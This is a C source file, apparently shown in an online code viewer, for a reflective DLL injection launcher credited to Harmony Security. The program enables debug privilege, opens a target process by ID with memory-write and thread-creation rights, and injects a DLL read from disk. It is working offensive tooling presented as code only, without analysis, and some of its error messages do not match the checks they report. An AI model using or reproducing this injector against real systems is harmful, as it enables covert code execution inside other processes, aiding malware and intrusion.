Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
//===============================================================================================//
2
// Copyright (c) 2013, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
3
// All rights reserved.
4
// 
5
// Redistribution and use in source and binary forms, with or without modification, are permitted 
6
// provided that the following conditions are met:
7
// 
8
//     * Redistributions of source code must retain the above copyright notice, this list of 
9
// conditions and the following disclaimer.
10
// 
11
//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
12
// conditions and the following disclaimer in the documentation and/or other materials provided 
13
// with the distribution.
14
// 
15
//     * Neither the name of Harmony Security nor the names of its contributors may be used to
16
// endorse or promote products derived from this software without specific prior written permission.
17
// 
18
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
19
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
20
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
21
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
22
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
23
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
24
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
25
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
26
// POSSIBILITY OF SUCH DAMAGE.
27
//===============================================================================================//
28
#define WIN32_LEAN_AND_MEAN
29
#include <windows.h>
30
#include <stdio.h>
31
#include <stdlib.h>
32
#include "LoadLibraryR.h"
33

34
#pragma comment(lib,"Advapi32.lib")
35

36
#define BREAK_WITH_ERROR( e ) { printf( "[-] %s. Error=%d", e, GetLastError() ); break; }
37

38
// Simple app to inject a reflective DLL into a process vis its process ID.
39
int main( int argc, char * argv[] )
40
{
41
	HANDLE hFile          = NULL;
42
	HANDLE hModule        = NULL;
43
	HANDLE hProcess       = NULL;
44
	HANDLE hToken         = NULL;
45
	LPVOID lpBuffer       = NULL;
46
	DWORD dwLength        = 0;
47
	DWORD dwBytesRead     = 0;
48
	DWORD dwProcessId     = 0;
49
	TOKEN_PRIVILEGES priv = {0};
50

51
#ifdef _WIN64
52
	char * cpDllFile  = "reflective_dll.x64.dll";
53
#else
54
#ifdef WIN_X86
55
	char * cpDllFile  = "reflective_dll.dll";
56
#else WIN_ARM
57
	char * cpDllFile  = "reflective_dll.arm.dll";
58
#endif
59
#endif
60

61
	do
62
	{
63
		// Usage: inject.exe [pid] [dll_file]
64

65
		if( argc == 1 )
66
			dwProcessId = GetCurrentProcessId();
67
		else
68
			dwProcessId = atoi( argv[1] );
69

70
		if( argc >= 3 )
71
			cpDllFile = argv[2];
72

73
		hFile = CreateFileA( cpDllFile, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL );
74
		if( hFile == INVALID_HANDLE_VALUE )
75
			BREAK_WITH_ERROR( "Failed to open the DLL file" );
76

77
		dwLength = GetFileSize( hFile, NULL );
78
		if( dwLength == INVALID_FILE_SIZE || dwLength == 0 )
79
			BREAK_WITH_ERROR( "Failed to get the DLL file size" );
80

81
		lpBuffer = HeapAlloc( GetProcessHeap(), 0, dwLength );
82
		if( !lpBuffer )
83
			BREAK_WITH_ERROR( "Failed to get the DLL file size" );
84

85
		if( ReadFile( hFile, lpBuffer, dwLength, &dwBytesRead, NULL ) == FALSE )
86
			BREAK_WITH_ERROR( "Failed to alloc a buffer!" );
87

88
		if( OpenProcessToken( GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken ) )
89
		{
90
			priv.PrivilegeCount           = 1;
91
			priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
92
		
93
			if( LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &priv.Privileges[0].Luid ) )
94
				AdjustTokenPrivileges( hToken, FALSE, &priv, 0, NULL, NULL );
95

96
			CloseHandle( hToken );
97
		}
98

99
		hProcess = OpenProcess( PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, dwProcessId );
100
		if( !hProcess )
101
			BREAK_WITH_ERROR( "Failed to open the target process" );
102

103
		hModule = LoadRemoteLibraryR( hProcess, lpBuffer, dwLength, NULL );
104
		if( !hModule )
105
			BREAK_WITH_ERROR( "Failed to inject the DLL" );
106

107
		printf( "[+] Injected the '%s' DLL into process %d.", cpDllFile, dwProcessId );
108
		
109
		WaitForSingleObject( hModule, -1 );
110

111
	} while( 0 );
112

113
	if( lpBuffer )
114
		HeapFree( GetProcessHeap(), 0, lpBuffer );
115

116
	if( hProcess )
117
		CloseHandle( hProcess );
118

119
	return 0;
120
}
121